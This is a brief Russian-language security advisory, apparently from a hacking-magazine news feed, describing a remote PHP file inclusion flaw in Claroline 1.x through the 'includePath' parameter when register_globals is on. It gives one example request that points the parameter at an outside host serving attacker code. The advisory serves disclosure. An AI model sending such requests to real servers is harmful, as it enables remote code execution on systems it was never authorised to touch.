PHP-инклюдинг в Claroline

Программа: Claroline 1.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "includePath" сценарием claroline/inc/lib/import.lib.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Успешное эксплуатирование уязвимости требует включение опции "register_globals".

Пример:

claroline/inc/lib/import.lib.php?includePath=http://shell/cmd.do?

"Анатолий Ализар : Постоянный автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.."